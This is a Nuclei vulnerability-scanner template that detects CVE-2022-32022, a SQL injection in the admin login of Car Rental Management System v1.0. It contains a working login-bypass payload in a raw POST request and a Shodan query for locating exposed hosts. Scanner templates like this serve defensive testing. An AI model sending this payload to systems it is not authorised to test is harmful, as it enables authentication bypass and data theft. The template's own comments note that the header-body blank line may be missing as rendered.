nuclei-templates/cves/2022/CVE-2022-32022.yaml


# Nuclei template: detects the unauthenticated SQL injection in the admin
# login handler of Car Rental Management System v1.0 (CVE-2022-32022).
# Indentation restored from a whitespace-mangled rendering; keys and values
# are otherwise as published.
id: CVE-2022-32022

info:
  name: Car Rental Management System v1.0 - SQL Injection
  author: arafatansari
  # High: the injection point is the admin login, so a hit implies an
  # authentication bypass / data-access risk on the affected host.
  severity: high
  description: |
    Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/ajax.php?action=login.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32022
  metadata:
    # Fingerprint for locating exposed instances; scope any scan to assets you own.
    shodan-query: http.html:"Car Rental Management System"
    # Quoted string as published; nuclei's schema normally takes a boolean here.
    verified: "true"
  tags: sql,cve,cms,2022

requests:
  # Single raw HTTP request against the login action. A raw request needs an
  # empty line between the last header and the body; confirm that line survived
  # the page rendering before running this template.
  - raw:
      - |
        POST /admin/ajax.php?action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        username=admin'+or+'1'%3D'1'%23&password=admin

    # All three matchers must hit. Note the weak signal: a body containing "1",
    # an HTML content type and HTTP 200 are common on unaffected login pages,
    # so positives should be confirmed manually before being acted on.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '1'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200